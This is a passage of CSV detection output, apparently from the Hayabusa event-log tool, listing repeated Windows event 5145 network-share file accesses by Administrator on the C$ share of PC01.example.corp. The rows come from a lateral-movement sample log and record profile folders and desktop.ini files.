0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 